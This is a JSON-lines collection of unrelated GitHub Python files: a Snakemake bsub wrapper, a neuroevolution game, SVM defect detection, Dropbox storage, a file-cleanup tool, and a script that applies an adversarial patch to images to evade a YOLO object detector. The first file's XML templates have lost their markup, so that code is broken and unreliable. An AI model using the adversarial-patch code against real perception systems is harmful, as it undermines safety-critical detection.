{"seq_id":"9883243847","text":"#### Geometry file (.xml file), unit cell information (.cif file) and scattering kernels file (name-scatterer.xml file) which defines the scattering formula or diffraction peaks\n\nimport os,sys, numpy as np\nthisdir = os.path.abspath(os.path.dirname(__file__))\nif thisdir not in sys.path:\n    sys.path.insert(0, thisdir)\n\ntemplate = \"\"\"\n\n    \n\n    {sample_blocks} \n\n    \n    {geom_regs} \n    \n\n    \n\n\n\"\"\"\ndef shape_file_entry(shape_name, shape_fileName):\n    return \"\"\" \n\"\"\".format(shape_name=shape_name, shape_fileName=shape_fileName)\n\n\ndef sample_block(name, shape_name, formula, strutureFiletype):\n    return \"\"\" \n    \n        &{shape_name};\n    \n    \n        {formula}\n        <{strutureFiletype}file>{formula}.{strutureFiletype}\n    \n    \n\"\"\".format(name=name, shape_name=shape_name, formula=formula, strutureFiletype=strutureFiletype)\n\nscatterers = {\n    ('outer-body', 'shapeAl', 'outer-body-geom', 'Al', 'xyz'), # (name, shape_name, geometry file name, formula)\n    ('inner-sleeve', 'shapeCu', 'inner-sleeve-geom', 'Cu', 'xyz'),\n    ('sample', 'shapeSample', 'sample_geom', 'Si', 'xyz'),\n    ('collimator', 'shapeColl','coll_geometry', 'B4C', 'cif'),\n}\n\ndef makeSAXML(sampleassembly_fileName, scatterers=scatterers):\n\n    shape_file_entries = [shape_file_entry(shape_name, shape_fileName) for name, shape_name, shape_fileName, formula,strutureFiletype in scatterers]\n    shape_file_entries='\\n'.join(shape_file_entries)\n    sample_blocks = [sample_block(name, shape_name, formula,strutureFiletype) for name, shape_name, shape_fileName, formula,strutureFiletype in scatterers]\n    
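# note: scatterers is a set literal, so the order of the generated XML blocks is arbitrary\n    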
sample_blocks = '\\n'.join(sample_blocks)\n    lines = ['' .format(name) for name, shape_name, shape_fileName, formula,strutureFiletype in scatterers]\n    geom_regs = '\\n        '.join(lines)\n    text = template.format(shape_file_entries=shape_file_entries, sample_blocks=sample_blocks, geom_regs=geom_regs)\n    with open(os.path.join(thisdir, '../sample/sampleassembly_{}.xml'.format(sampleassembly_fileName)), \"w\") as sam_new:\n        sam_new.write(text)\n    # return(sampleassembly_fileName)\n    return()\n\n\n\n\n\n\n","repo_name":"Fahima-Islam/c3dp","sub_path":"c3dp/sampleassembly_program.py","file_name":"sampleassembly_program.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"11448514430","text":"#!/usr/bin/env python3\n#\n# Ed Mountjoy\n#\n# Script adapted from: https://github.com/slowkow/snakefiles/blob/master/bsub.py\n#\n# bsub.py\n#\n# This script checks a Snakemake job's properties (threads, resources) and chooses\n# an appropriate LSF queue that meets the requirements. It also automatically\n# chooses the queue that is least busy unless you already specified a queue.\n#\n# Usage\n# -----\n#\n# Add \"threads\" and \"resources\" to your resource-intensive rules:\n#\n# rule my_rule:\n# input: ...\n# output ...\n# threads: 4\n# resources:\n# mem=8000, # megabytes\n# runtime=35, # minutes\n# queue=\"my_favorite_queue\" # queue name\n#\n# Invoke snakemake with the path to bsub.py:\n#\n# snakemake --jobs 999 --cluster \"path/to/bsub.py -o bsub.stdout\"\n#\n# Consider adding bsub.py to a folder in your $PATH, so you can do:\n#\n# snakemake --jobs 999 --cluster \"bsub.py -o bsub.stdout\"\n\n\n\nimport os\nimport sys\nimport json\nimport argparse\nimport time\n\nfrom subprocess import check_output\n\nfrom snakemake.utils import read_job_properties\n\ndef main():\n\n    # Parse command line\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"jobscript\")\n    args = parser.parse_args()\n\n    # Parse the job properties\n    job_properties = read_job_properties(args.jobscript)\n\n    # By default, we use 1 thread.\n    threads = job_properties.get(\"threads\", 1)\n\n    # Get default mem, runtimes and output files from cluster.json\n    mem = int(job_properties[\"cluster\"][\"mem\"])\n    runtime = int(job_properties[\"cluster\"][\"runtime\"])\n    stdout = job_properties[\"cluster\"][\"output\"]\n    stderr = job_properties[\"cluster\"][\"error\"]\n    jobname = job_properties[\"cluster\"][\"name\"]\n\n    # If the rule has specified resources, replace with those\n    mem = int(job_properties[\"resources\"].get(\"mem\", mem))\n    runtime = int(job_properties[\"resources\"].get(\"runtime\", runtime))\n\n    # Make log file directories\n    os.makedirs(os.path.dirname(stdout), exist_ok=True)\n    os.makedirs(os.path.dirname(stderr), exist_ok=True)\n\n    # Let the user specify the queue.\n    queue = job_properties[\"resources\"].get(\"queue\", None)\n\n    # Otherwise, choose an appropriate queue based on required resources.\n    if not queue:\n        queue = get_queue(threads, mem, runtime)\n\n    # If we fail to find a queue, exit with an error.\n    if not queue:\n        msg = \"No valid queue! 
job_properties:\\n\"\n        js = json.dumps(job_properties, indent=4, sort_keys=True)\n        sys.stderr.write(msg + js)\n        sys.exit(1)\n\n    # Submit the job to the queue.\n    run_bsub(queue, threads, mem, runtime, args.jobscript, jobname, stdout, stderr)\n    time.sleep(1)\n\ndef run_bsub(queue, threads, mem, runtime, script, jobname, stdout, stderr):\n    cmd = \"bsub -J {j} -q {q} -n {t}\".format(j=jobname, q=queue, t=threads)\n    if mem:\n        cmd += ' -R \"select[mem>{m}] rusage[mem={m}] span[hosts=1]\" -M{m}'.format(m=mem) # \"resources\" : \"\\\"select[mem>2000] rusage[mem=2000] span[hosts=1]\\\"\",\n    if runtime:\n        cmd += \" -W {}\".format(runtime)\n    if stdout:\n        cmd += \" -o {}\".format(stdout)\n    if stderr:\n        cmd += \" -e {}\".format(stderr)\n    cmd += \" {s}\".format(s=script)\n    print(cmd)\n    return os.system(cmd)\n\ndef get_queue(threads, mem, runtime):\n    # All the Sanger farm queues.\n    queues = [\"small\", \"normal\", \"long\", \"basement\", \"hugemem\", \"teramem\"]\n    # Find valid queues for this job's requirements.\n    retval = []\n    # The other queues are all ok if we leave runtime=0.\n    if threads <= 24 and mem <= 256000 and runtime <= 30:\n        retval.append(\"small\")\n    if threads <= 24 and mem <= 256000 and runtime <= 60 * 12:\n        retval.append(\"normal\")\n    if threads <= 24 and mem <= 256000 and runtime <= 60 * 24 * 2:\n        retval.append(\"long\")\n    if threads <= 24 and mem <= 256000 and runtime <= 60 * 24 * 30:\n        retval.append(\"basement\")\n    if threads <= 24 and 196000 < mem < 727500 and runtime <= 60 * 24 * 15:\n        retval.append(\"hugemem\")\n    if threads <= 24 and 727500 < mem < 2.9e6 and runtime <= 60 * 24 * 15:\n        retval.append(\"teramem\")\n    # Make sure we have at least one valid queue.\n    if not len(retval):\n        return None\n\n    # # Get the number of currently running jobs on each queue.\n    # lines = check_output(\"bqueues\").split(b\"\\n\")[1:-1]\n    # lines = [line.decode(\"utf-8\").split() for line in lines]\n    # njobs = {x[0]: int(x[7]) for x in lines}\n    # # Among valid queues, choose the one with fewest running jobs.\n    # return min(retval, key=lambda j: njobs[j])\n\n    # Return the first of the suitable queues\n    return retval[0]\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"edm1/templates","sub_path":"snakemake_template/bsub.py","file_name":"bsub.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"24864195405","text":"import PIL\nimport load_data\nfrom tqdm import tqdm\n\nfrom load_data import *\nimport gc\nimport matplotlib.pyplot as plt\nfrom torch import autograd\nimport torchvision\nfrom torchvision import transforms\nfrom tensorboardX import SummaryWriter\nimport subprocess\n\nimport patch_config\nimport sys\nimport time\n\nclass WaymoPatchApplier(object):\n\tdef __init__(self, mode):\n\t\tself.config = patch_config.patch_configs[mode]()\n\n\t\tself.darknet_model = Darknet(self.config.cfgfile)\n\t\tself.darknet_model.load_weights(self.config.weightfile)\n\t\tself.darknet_model = self.darknet_model.eval().cuda() # TODO: Why eval?\n\t\tself.patch_applier = PatchApplier().cuda()\n\t\tself.patch_transformer = PoseEstimationPatchTransformer().cuda()\n\n\t\tself.writer = self.init_tensorboard(mode)\n\n\tdef init_tensorboard(self, name=None):\n\t\tif name is not None:\n\t\t\ttime_str = time.strftime(\"%Y%m%d-%H%M%S\")\n\t\t\treturn SummaryWriter(f'runs/{time_str}_{name}')\n\t\telse:\n\t\t\treturn SummaryWriter()\n\n\tdef apply_patch_and_save(self):\n\t\timg_size = 
self.darknet_model.height\n\t\tbatch_size = self.config.batch_size\n\t\tmax_lab = 1\n\n\t\ttime_str = time.strftime(\"%Y%m%d-%H%M%S\")\n\t\tprint(f'batch_size: {batch_size}')\n\t\t# Generate starting point\n\t\t# adv_patch_cpu = self.generate_patch(\"gray\")\n\t\t# adv_patch_cpu = self.read_image(\"saved_patches/patch_image_waymo_2.png\")\n\t\tadv_patch_cpu = self.read_image(\"patches/class_detection.png\")\n\n\t\tadv_patch_cpu.requires_grad_(True)\n\n\t\ttrain_loader = torch.utils.data.DataLoader(InriaDataset(self.config.img_dir, self.config.lab_dir, max_lab, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t   batch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t   num_workers=1)\n\t\tself.number_of_images = len(train_loader)\n\t\tfor i_batch, (img_batch, lab_batch) in tqdm(enumerate(train_loader), desc=f'Running Loading',\n\t\t\t\t\t\t\t\t\t\t\t\t\ttotal=self.number_of_images):\n\t\t\timg_batch = img_batch.cuda()\n\t\t\tlab_batch = lab_batch.cuda()\n\t\t\tadv_patch = adv_patch_cpu.cuda()\n\t\t\tadv_batch_t = self.patch_transformer(adv_patch, lab_batch, img_size, do_rotate=True, rand_loc=False)\n\t\t\tp_img_batch = self.patch_applier(img_batch, adv_batch_t)\n\t\t\t# self.writer.add_image('test_img'+str(i_batch), p_img_batch[0])\n\t\t\t\n\t\t\tprint(f'writing image {i_batch}')\n\t\t\timage_name = self.config.dir_to_store+'og/'+str(i_batch)+'_og_img.jpg'\n\t\t\tadv_image_name = self.config.dir_to_store+'patched/'+str(i_batch)+'_patched_img.jpg'\n\n\t\t\t# og_img_tensor = self.resize_img(p_img_batch[0], 1280, 1920)\n\t\t\t# adv_img_tensor = self.resize_img(img_batch[0], 1280, 1920)\n\t\t\tself.writer.add_image('test_img'+str(i_batch), p_img_batch[0])\n\n\t\t\ttorchvision.utils.save_image(p_img_batch[0], adv_image_name)\n\t\t\ttorchvision.utils.save_image(img_batch[0], image_name)\n\n\tdef generate_patch(self, type):\n\t\t\"\"\"\n\t\tGenerate a random patch as a starting point for optimization.\n\n\t\t:param type: Can be 'gray' or 'random'. 
Whether to generate a gray or a random patch.\n\t\t:return:\n\t\t\"\"\"\n\t\tprint(f'patch size: {self.config.patch_size}')\n\t\tif type == 'gray':\n\t\t\tadv_patch_cpu = torch.full((3, self.config.patch_size, self.config.patch_size), 0.5)\n\t\telif type == 'random':\n\t\t\tadv_patch_cpu = torch.rand((3, self.config.patch_size, self.config.patch_size))\n\n\t\treturn adv_patch_cpu\n\n\tdef read_image(self, path):\n\t\t\"\"\"\n\t\tRead an input image to be used as a patch\n\n\t\t:param path: Path to the image to be read.\n\t\t:return: Returns the transformed patch as a pytorch Tensor.\n\t\t\"\"\"\n\t\tpatch_img = Image.open(path).convert('RGB')\n\t\ttf = transforms.Resize((self.config.patch_size, self.config.patch_size))\n\t\tpatch_img = tf(patch_img)\n\t\ttf = transforms.ToTensor()\n\t\tadv_patch_cpu = tf(patch_img)\n\t\treturn adv_patch_cpu\n\t\n\tdef resize_img(self, img_tensor, width, length):\n\t\ttf = transforms.Resize((length, width))\n\t\timg_tensor = tf(img_tensor)\n\t\treturn img_tensor\n\n\ndef main():\n\tif len(sys.argv) != 2:\n\t\tprint('You need to supply (only) a configuration mode.')\n\t\tprint('Possible modes are:')\n\t\tprint(patch_config.patch_configs)\n\n\twaymo_patch_applier = WaymoPatchApplier(sys.argv[1])\n\twaymo_patch_applier.apply_patch_and_save()\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"rishabhranawat/adv-patches-transferability","sub_path":"adv-yolo-patches/waymo_patch_apply.py","file_name":"waymo_patch_apply.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"3985814205","text":"import random\r\nimport numpy as np \r\n\r\nclass Synapses: #these are the neural network's weights which are to be evolved\r\n    def __init__(self, input_dimension, output_dimension):\r\n        self.weights = 2 * np.random.random((input_dimension, output_dimension)) - 1 \r\n    \r\n    def sigmoid(self, x):\r\n        return 1/(1+np.exp(-x))\r\n\r\n    def f(self, values):\r\n        return self.sigmoid(np.dot(values, self.weights)) \r\n\r\n\r\nclass Organism: #neural network\r\n    def __init__(self, topology, probability = .1):\r\n        self.p = probability\r\n        self.fitness = 0\r\n        [self.input_dimension, self.hidden_dimension, self.output_dimension] = topology\r\n        self.l0 = Synapses(self.input_dimension, self.hidden_dimension)\r\n        self.l1 = Synapses(self.hidden_dimension, self.output_dimension)\r\n    \r\n    def mutate(self):\r\n        if random.random() <= self.p:\r\n            for i in range(len(self.l0.weights) - 1):\r\n                if random.random() <= self.p:\r\n                    self.l0.weights[i] = 2*random.random() - 1.\r\n            for i in range(len(self.l1.weights) - 1):\r\n                if random.random() <= self.p:\r\n                    self.l1.weights[i] = 2*random.random() - 1.\r\n\r\n    def think(self, data_in):\r\n        data = np.array(data_in)\r\n        data_out = self.l1.f( self.l0.f(data))\r\n        return int(data_out[0]) + int(data_out[1]) * 7\r\n\r\n    def save(self, file_name = 'evolved_nn.npy'):\r\n        np.save(file_name, {'l0_weights':self.l0.weights, 'l1_weights':self.l1.weights}) \r\n\r\n    def load(self, file_name = 'evolved_nn.npy'):\r\n        config = np.load(file_name).item()\r\n        self.l0.weights = config['l0_weights']\r\n        self.l1.weights = config['l1_weights']\r\n\r\nclass GA: # genetic algorithm \r\n    def __init__(self):\r\n        self.generation = 0\r\n\r\n    def run(self, topology = [1,3,1], pop_size = 50, iterations = 100, elitism = .2, option = 0, mutation = .2):\r\n        self.pop_size = pop_size\r\n        self.iterations = iterations\r\n        self.elitism = elitism\r\n        self.organisms = [Organism(topology = 
topology, probability = mutation) for _ in range(self.pop_size)]\r\n self.fittest = random.choice(self.organisms) \r\n for _ in range(self.iterations):\r\n self.tournament(option)\r\n self.display_stats()\r\n self.evolve()\r\n self.fittest.save()\r\n\r\n def tournament(self, option):\r\n for organism in self.organisms:\r\n organism.fitness = 0\r\n if option == 0: #each plays against a random moving bot\r\n for organism in self.organisms:\r\n winner, loser = self.compete(organism, organism)\r\n organism = loser\r\n elif option == 1: #quicker - everyone paired off\r\n for i,j in zip(range(0,self.pop_size,2), range(1,self.pop_size,2)):\r\n winner, loser = self.compete(self.organisms[i], self.organisms[j] )\r\n self.organisms[i] = winner\r\n self.organisms[j] = loser\r\n elif option == 2: #thorough - everyone faces each other once\r\n for i in range(self.pop_size):\r\n for j in range(i, self.pop_size): \r\n winner, loser = self.compete(self.organisms[i], self.organisms[j] )\r\n self.organisms[i] = winner\r\n self.organisms[j] = loser\r\n \r\n def evolve(self):\r\n elite = sorted(self.organisms, key=lambda x: x.fitness, reverse = True)[:int(self.elitism * self.pop_size)]\r\n rest = self.reproduce(elite)\r\n self.organisms = elite + rest\r\n\r\n def compete(self, player1, player2):\r\n winner, loser = Game(player1, player2).play()\r\n winner.fitness += 1\r\n loser.fitness -= 1 \r\n return winner, loser\r\n \r\n def display_stats(self):\r\n for organism in self.organisms:\r\n if organism.fitness > self.fittest.fitness:\r\n self.fittest = organism\r\n self.generation += 1\r\n print('> GEN:',self.generation,'BEST:',self.fittest.fitness)\r\n\r\n def reproduce(self, elite):\r\n new_organisms = []\r\n elite_size = int(self.elitism * self.pop_size)\r\n leftover = self.pop_size - elite_size \r\n for i in range(0,leftover,2):\r\n a = b = 0\r\n while a == b: a, b = random.randint(0, elite_size - 1), random.randint(0, elite_size - 1)\r\n child1, child2 = self.crossover(elite[a], elite[b])\r\n child1.mutate()\r\n child2.mutate()\r\n new_organisms.append(child1)\r\n new_organisms.append(child2)\r\n return new_organisms\r\n\r\n def crossover(self, parent1, parent2):\r\n topology = [parent1.input_dimension, parent1.hidden_dimension, parent1.output_dimension]\r\n child1, child2 = Organism(topology = topology, probability = parent1.p), Organism(topology = topology, probability = parent1.p)\r\n child1.l0.weights, child1.l1.weights = parent1.l0.weights, parent2.l1.weights \r\n child2.l0.weights, child2.l1.weights = parent2.l0.weights, parent1.l1.weights\r\n return child1, child2\r\n\r\nclass Human: #to play a game against evolved A.I.\r\n def think(self, _):\r\n return (int(input('> row: ')) + int(input('> column: ')) * 7)\r\n\r\nclass Game: #game \"isolation\" used as the fitness function for the genetic algorithm\r\n directions = [(-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1)] #variant: players moves like a chess knight\r\n\r\n def __init__(self, player1, player2, board_dimensions = [7,7]):\r\n [self.width, self.height] = board_dimensions\r\n self.turn = 0\r\n self._active_player = player1\r\n self._inactive_player = player2\r\n self.board_state = [0] * self.width * self.height #the 2D board represented as a 1D array [0000...] 
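(cell (r, c) maps to index r + c*height; 0 = free, 1 = visited)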
\r\n        self.p1_location = -1 # -1 indicates not on board yet\r\n        self.p2_location = -1\r\n\r\n    def legal_move(self, coordinate):\r\n        embedded = coordinate[0] + coordinate[1] * self.height #2D x,y --> 1D\r\n        return (0 <= coordinate[0] < self.height and 0 <= coordinate[1] < self.width and self.board_state[embedded] == 0) #legal IF within board width, height & position is not occupied (0)\r\n\r\n    def possible_moves(self):\r\n        if self.my_location() == -1: #not moved yet - player can be placed anywhere on board thats empty to begin with\r\n            return [(i, j) for j in range(self.width) for i in range(self.height) if self.board_state[i + j * self.height] == 0]\r\n        (r, c) = self.xy(self.my_location())\r\n        valid_moves = [(r + dr, c + dc) for dr, dc in self.directions if self.legal_move((r + dr, c + dc))]\r\n        random.shuffle(valid_moves)\r\n        return valid_moves\r\n\r\n    def apply_move(self, coordinate): #1D embedded coord \r\n        self.board_state[coordinate] = 1\r\n        if self.turn % 2 == 0: \r\n            self.p1_location = coordinate\r\n        else:\r\n            self.p2_location = coordinate\r\n\r\n    def my_location(self):\r\n        if self.turn % 2 == 0: #even turn means its player1's turn\r\n            return self.p1_location\r\n        return self.p2_location\r\n\r\n    def xy(self, embedded): #1D embedded coordinate --> 2D x,y coordinate\r\n        return (embedded % self.height, embedded // self.height)\r\n\r\n    def play(self, history = False): \r\n        while True: \r\n            coord = self._active_player.think(self.board_state + [self.my_location()]) #neural network provides its move as a 1D board index \r\n\r\n            if self.turn %2 == 0: #on player1's turns a random legal move is used instead\r\n                coord = random.choice(self.possible_moves())\r\n                coord = coord[0] + coord[1] * self.height\r\n\r\n            if self.xy(coord) not in self.possible_moves(): #illegal move - you lose! \r\n                return self._inactive_player, self._active_player #return winning player (the other guy) & losing player\r\n            \r\n            self.apply_move(coord)\r\n            \r\n            if history: \r\n                print(self.turn, self.xy(coord))\r\n                print( self.display())\r\n\r\n            self._active_player, self._inactive_player = self._inactive_player, self._active_player #switch players\r\n            self.turn += 1\r\n    \r\n    def display(self, symbols=['x', 'o']):\r\n        col_margin = len(str(self.height - 1)) + 1\r\n        prefix = \"{:<\" + \"{}\".format(col_margin) + \"}\"\r\n        offset = \" \" * (col_margin + 3)\r\n        out = offset + ' '.join(map(str, range(self.width))) + '\\n\\r'\r\n        for i in range(self.height):\r\n            out += prefix.format(i) + ' | '\r\n            for j in range(self.width):\r\n                idx = i + j * self.height\r\n                if not self.board_state[idx]:\r\n                    out += ' '\r\n                elif self.p1_location == idx:\r\n                    out += symbols[0]\r\n                elif self.p2_location == idx:\r\n                    out += symbols[1]\r\n                else:\r\n                    out += '-'\r\n                out += ' | '\r\n            out += '\\n\\r'\r\n        return out\r\n\r\nGA().run(iterations = 1000, topology = [50, 100, 2], option = 0, mutation = .4)\r\nplayer1 = Organism([50,100,2])\r\nplayer1.load()\r\nplayer2 = Human()\r\nGame(player2, player1).play(history = True)","repo_name":"mohammedterry/alphaIsolation","sub_path":"neuroevo.py","file_name":"neuroevo.py","file_ext":"py","file_size_in_byte":9215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"20153179729","text":"import os\nimport cv2\nimport numpy as np\nfrom sklearn.svm import OneClassSVM\nfrom skimage.io import imread\nfrom skimage.filters import prewitt\nimport matplotlib.pyplot as plt\nfrom skimage import measure\n\n\ndef load_images(directory):\n    image_size = (256, 256)\n    images = []\n    for filename in os.listdir(directory):\n        if 
filename.endswith('.jpg') or filename.endswith('.png') or filename.endswith('.jpeg'):\n            img = imread(os.path.join(directory, filename), as_gray=True) # Convert to grayscale\n            resized = cv2.resize(img, image_size, interpolation=cv2.INTER_AREA)\n            images.append(resized)\n    return images\n\ndef extract_features(images):\n    features = []\n    for img in images:\n        # Extracting Edge Features\n        edges_prewitt = prewitt(img)\n        features.append(edges_prewitt)\n    return features\n\ndef train_one_class_classifier(features):\n    clf = OneClassSVM(gamma='auto', nu=0.01)\n    features_reshaped = np.array(features).reshape(len(features), -1)\n    clf.fit(features_reshaped)\n    return clf\n\n\ndef detect_defects(image, clf):\n    # Extract features from the test image\n    test_feature = prewitt(image) \n    \n\n    # plt.imshow(test_feature, cmap='gray')\n\n    # Reshape the feature to match the shape of training features\n    test_feature_reshaped = test_feature.reshape(1, -1)\n\n    # Predict the anomaly score for the test image\n    anomaly_score = clf.decision_function(test_feature_reshaped)[0]\n\n    print(f\"Anomaly Score: {anomaly_score}\")\n\n    # Map the anomaly score onto a defect grade; the elif chain leaves no gaps at the cutoffs\n    if anomaly_score < 0.002:\n        return \"flawless\"\n    elif anomaly_score < 0.004:\n        return \"good\"\n    elif anomaly_score < 0.006:\n        return \"average\"\n    elif anomaly_score < 0.008:\n        return \"bad\"\n    else:\n        return \"critical\"\n\n\n# Set the paths to your dataset\ntrain_directory = './train'\ntest_directory = './test'\n\n# Load train dataset\ntrain_images = load_images(train_directory)\n\n# Extract features from the train images\ntrain_features = extract_features(train_images)\n\n# Train the one-class classifier\nclf = train_one_class_classifier(train_features)\n\n\n# Program run loop\nwhile True:\n    print('Enter image id: (0, 1, 2, 3...) 
\\nEnter x to exit!')\n    user_input = input()\n    if user_input == 'x':\n        break\n    # Load test image\n    image_id = int(user_input)\n    image_path = os.path.join(test_directory, f'{image_id}.jpg')\n    img = imread(image_path, as_gray=True) # Convert to grayscale\n    test_image = cv2.resize(img, (256, 256), interpolation=cv2.INTER_AREA)\n\n    # Print test image\n    test_img = cv2.imread(image_path)\n    \n    # Detect defects\n    result = detect_defects(test_image, clf)\n    print(f\"Defect Degree: {result}\")\n    cv2.imshow(f\"Defect Degree: {result}\",test_img)\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ObjectOrientedMindset/defect_detection_oneClassSVM","sub_path":"OneClassSVM.py","file_name":"OneClassSVM.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
{"seq_id":"20330501685","text":"import abc\n\nimport dropbox\nfrom io import BytesIO\n\nimport attr\n\nfrom mwc.core.cfg import load_settings\n\nsettings = load_settings()\n\n\n@attr.s\nclass BaseStorage(abc.ABC):\n    namespace: str = attr.ib()\n\n    def get(\n        self,\n        filename: str,\n    ) -> BytesIO:\n        ...\n\n    def save(\n        self,\n        filename: str,\n        storage_object: BytesIO,\n    ) -> None:\n        ...\n\n\n@attr.s\nclass DropBoxStorage(BaseStorage):\n    namespace: str = attr.ib()\n    _client = dropbox.Dropbox(settings['DROPBOX_TOKEN'])\n\n    def __attrs_post_init__(self):\n        if not self._folder_exists(self.namespace):\n            self._create_folder(self.namespace)\n\n    def _folder_exists(self, namespace):\n        expected_path = f'/{namespace.lower()}'\n        matches = self._client.files_search_v2(namespace).matches\n        folder_matches = [\n            match for match in matches\n            if isinstance(match.metadata.get_metadata(), dropbox.files.FolderMetadata) and\n            match.metadata.get_metadata().path_lower == expected_path\n        ]\n        if not folder_matches:\n            return False\n        else:\n            return True\n\n    def _create_folder(self, namespace):\n        return self._client.files_create_folder_v2(f'/{namespace}')\n\n    def get(\n        self,\n        filename: str,\n    ) -> BytesIO:\n        _, content = self._client.files_download(f'/{self.namespace}/{filename}')\n        return content\n\n    def save(\n        self,\n        filename: str,\n        content: BytesIO,\n    ) -> None:\n        destination = f'/{self.namespace}/{filename}'\n        self._client.files_upload(content.read(), destination)\n\n\ndef get_storage(namespace):\n    return DropBoxStorage(namespace)\n","repo_name":"Bgeninatti/MovieWordCloud","sub_path":"mwc/core/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"10324656790","text":"#!/usr/bin/python\n#coding=utf-8\n\n# Expired-file cleanup tool\n# Removes logs and temporary files older than a given age\n# Author: kevin.hongs@gmail.com\n# Revised: 2016/03/03\n\nimport os\nimport re\nimport sys\nimport time\nimport datetime\nfrom getopt import getopt\n\ndef hsClean(dn, tm, ep, op, nm, ne):\n    \"\"\"\n    Cleanup tool\n    dn: directory to clean\n    tm: remove files modified before this time\n    ep: remove empty directories\n    op: print only, do not delete\n    nm: file name regex\n    ne: exclude the files matched by nm\n    \"\"\"\n\n    fc = 0\n    fe = 0\n    for fi in os.listdir(dn):\n        if fi == \".\" or fi == \"..\":\n            continue\n\n        fn = os.path.join(dn, fi)\n        if os.path.islink(fn):\n            continue\n        if os.path.isfile(fn):\n            st = os.stat(fn)\n\n            if tm < st.st_mtime:\n                continue\n            if nm:\n                if nm.match(fi):\n                    if ne:\n                        continue\n                else:\n                    if not ne:\n                        continue\n\n            print(time.strftime(\"%Y/%m/%d %H:%M:%S\", time.localtime(st.st_mtime)), fn)\n            if not op:\n                os.remove(fn)\n            fe += 1\n        else:\n            ap = hsClean(fn, tm, ep, op, nm, ne)\n\n            if not ap:\n                continue\n            if 
not ep:\n                continue\n\n            print(\"0000/00/00 00:00:00\" , fn)\n            if not op:\n                os.remove(fn)\n            fe += 1\n        fc += 1\n\n    return fc == fe\n\ndef hsPtime(tm):\n    \"\"\"\n    Accepted time formats:\n    1234567890\n    1w2d3h5m6s\n    2015/10/11\n    2015/10/11T10:20:30\n    \"\"\"\n\n    mt = re.compile(r\"^\\d+$\").match(tm)\n    if mt:\n        return int (tm)\n\n    mt = re.compile(r\"^(\\d+w)?(\\d+d)?(\\d+h+)?(\\d+m)?(\\d+s)?$\").match(tm)\n    if mt:\n        tm = datetime.datetime.now()\n        tg = mt.group(1)\n        if tg:\n            tm -= datetime.timedelta(weeks=int(tg[:-1]))\n        tg = mt.group(2)\n        if tg:\n            tm -= datetime.timedelta( days=int(tg[:-1]))\n        tg = mt.group(3)\n        if tg:\n            tm -= datetime.timedelta(hours=int(tg[:-1]))\n        tg = mt.group(4)\n        if tg:\n            tm -= datetime.timedelta(minutes=int(tg[:-1]))\n        tg = mt.group(5)\n        if tg:\n            tm -= datetime.timedelta(seconds=int(tg[:-1]))\n        return time.mktime(tm.timetuple())\n\n    if len(tm) <= 10:\n        return time.mktime(time.strptime(tm, r\"%Y/%m/%d\"))\n    else:\n        return time.mktime(time.strptime(tm, r\"%Y/%m/%dT%H:%M:%S\"))\n\nif __name__ == \"__main__\":\n    def cmd_help():\n        print(\"Usage: strip.py DIR_NAME EXP_TIME\")\n        print(\"EXP_TIME format:\")\n        print(\" 2015/12/17T12:34:56 Before this time\")\n        print(\" 1234567890 Before this timestamp\")\n        print(\" 1w2d3h5m6s Before some weeks, days...\")\n        print(\"Another options:\")\n        print(\" -p --print Just print files\")\n        print(\" -e --empty Remove empty dir\")\n        print(\" -n --name REGEXP File name regexp\")\n        print(\" -x --deny Exclude names\")\n        print(\" -h --help Show this msg\")\n\n    if len(sys.argv) < 3:\n        cmd_help( )\n        sys.exit(0)\n\n    dn = sys.argv[1]\n    tm = sys.argv[2]\n    ep = False\n    op = False\n    nm = None\n    ne = False\n\n    if not dn:\n        print(\"Argument 1 (folder name) required!\")\n        cmd_help( )\n        sys.exit(1)\n    if not tm:\n        print(\"Argument 2 (expire time) required!\")\n        cmd_help( )\n        sys.exit(1)\n\n    opts, args = getopt(sys.argv[3:], \"pen:xh\", [\"print\", \"empty\", \"name=\", \"deny\", \"help\"])\n    for n,v in opts:\n        if n in (\"-p\", \"--print\"):\n            op = True\n        if n in (\"-e\", \"--empty\"):\n            ep = True\n        if n in (\"-n\", \"--name\"):\n            nm = v\n        if n in (\"-x\", \"--deny\"):\n            ne = True\n        if n in (\"-h\", \"--help\"):\n            cmd_help( )\n            sys.exit(0)\n\n    tm = hsPtime( tm )\n    dn = os.path.abspath(dn)\n    if nm:\n        nm = re.compile(nm)\n\n    print(\"Delete files before \" + time.strftime(r\"%Y/%m/%d %H:%M:%S\", time.localtime(tm)) + \" in \" + dn)\n\n    hsClean(dn, tm, ep, op, nm, ne)\n","repo_name":"ihongs/HongsCORE","sub_path":"hongs-web/web/WEB-INF/bin/strip.py","file_name":"strip.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"40"}
